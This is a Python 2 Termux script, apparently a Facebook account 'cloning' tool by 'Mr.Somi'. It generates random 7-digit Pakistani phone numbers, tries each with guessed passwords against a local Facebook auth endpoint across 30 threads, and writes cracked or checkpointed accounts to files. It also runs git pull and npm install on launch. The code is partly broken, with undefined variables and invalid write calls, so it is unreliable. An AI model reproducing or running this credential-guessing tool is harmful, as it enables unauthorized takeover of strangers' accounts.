#!/usr/bin/python
# coding=utf-8
import os
import sys
import time
import datetime
import re
import threading
import json
import random
import requests
import hashlib
import cookielib
import uuid
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
os.system('rm -rf .txt')
for n in range(20000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
__author__ = 'Mr.Somi'
__copyright = 'All rights reserved . Copyright  Mr.Somi'
os.system('termux-setup-storage')

try:
    os.mkdir('/sdcard/ids')
except OSError:
    pass

bd = random.randint(2e+07, 3e+07)
sim = random.randint(20000, 40000)

header = {
    'x-fb-connection-bandwidth': repr(bd),
    'x-fb-sim-hni': repr(sim),
    'x-fb-net-hni': repr(sim),
    'x-fb-connection-quality': 'EXCELLENT',
    'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
    'user-agent': 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]',
    'content-type': 'application/x-www-form-urlencoded',
    'x-fb-http-engine': 'Liger' }
os.system('git pull')
os.system('clear')
logo = """
 \x1b[0;32m     _______  _______  _______ _________
 \x1b[0;32m    (  ____ \(  ___  )(       )\__   __/
 \x1b[0;32m    | (    \/| (   ) || () () |   ) (   
 \x1b[0;32m    | (_____ | |   | || || || |   | |   
 \x1b[0;31m    (_____  )| |   | || |(_)| |   | |   
 \x1b[0;31m          ) || |   | || |   | |   | |   
 \x1b[0;31m    /\____) || (___) || )   ( |___) (___
 \x1b[0;31m    \_______)(_______)|/     \|\_______/
     \x1b[105m\x1b[37;1mCODED BY SOMI-AWAN\x1b[0m
\033[1;97m-----------------------------------------------
\x1b[0;36mDEVOLPER    :   SOMI AWAN
\x1b[0;36mWHATSAAP    :   03455453538
\x1b[0;36mFACEBOOK    :   https://www.facebook.com/SO MI
\033[1;97m-----------------------------------------------
"""

def reg():
    os.system('clear')
    print logo
    print ''
    print '\t    Setup Your Connection'
    print ''
    print ''
    print '\x1b[1;90m                 Connecting...'
    time.sleep(5)
    print ''
    print ''
    print '\x1b[1;92m                  Connected '
    print ''
    os.system('cd ..... && npm install')
    os.system('fuser -k 5000/tcp &')
    os.system('#')
    os.system('cd ..... && node index.js &')
    time.sleep(2)
    os.system('clear')
    login()

def login():
    os.system('clear')
    print logo
    
    print('\x1b[1;93m〖\x1b[1;92m1\x1b[1;96m〗7 Digits Cloning \033[1;0m     ') 
    print('\x1b[1;93m〖\x1b[1;92m1\x1b[1;96m〗STOP CLONING \033[1;0m     ')
    
    pilih_Somi()
   
def pilih_Somi():    
    Somi = raw_input("\n\033[1;96m•••> \033[1;93m")
    if Somi =="":
        print "\x1b[1;97mSORRY WRONG "
        pilih_Somi()
        Somi()
    elif Somi =="1":
    	os.system("clear")
        print logo
        try:
            c = raw_input("\033[1;93m    951-331-953-954-955-956-520-521-522-523'\n>>\033[1;96m")
            k="03"
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
            Somi()
            
    elif Somi == '2':
    	six()
    elif Somi == '0':
    	tik()
        exb()    
        login()
    else:
        print '[!] Fill In Correctly'
        action()
    print 47* '\033[1;96m▬'
    xxx = str(len(id))
    print('\033[1;97m(\033[1;91m✓\033[1;97m) TOTAL IDS NUMBER : '+xxx)
    print('\033[1;97m(\033[1;91m✓\033[1;97m) CODE YOU CHOOSE UFONE : '+c)
    print("\033[1;97m(\033[1;91m✓\033[1;97m) PLEASE WAIT, PROCESS IS START ..")
    print("\033[1;97m(\033[1;91m!\033[1;97m) To Stop This Process Press Ctrl Then z")
    print 47* '\033[1;96m▬'

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            pass1 = name.lower() + p1
            data = requests.get('http://localhost:5000/auth?id=' + k + c + uid + '&pass=' + pass1, headers=header).text
            q = json.loads(data)
            if 'loc' in q:
                print '\x1b[1;92m[SOMI-OK] \x1b[1;92m'+ k + c  + uid + ' | ' + pass1
                ok = open('/sdcard/ids/SOMI_OK.txt', 'a')
                ok.write(+ k + c + uid + ' | ' + pass1 + '\n')
                ok.close()
                oks.append(c+uid + pass1)
            elif 'www.facebook.com' in q['error']:
                print '\x1b[1;31;1m[SOMI-CP] '+ k + c + uid + ' | ' + pass1
                cp = open('HOP_CP.txt', 'a')
                cp.write(+ k + c + uid + ' | ' + pass1 + '\n')
                cp.close()
                cps.append(c+uid + pass1)
            
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print ''
    print 47 * '-'
    print ''
    print ' \x1b[1;93mCloning Completed'
    print ' \x1b[1;92mTotal Ok/Cp:' + str(len(oks)) + '/' + str(len(cps))
    print ''
    print 47 * '-'
    raw_input(' \x1b[1;93mGo back')
    auto_crack()
    
    


if __name__ == '__main__':
    reg()
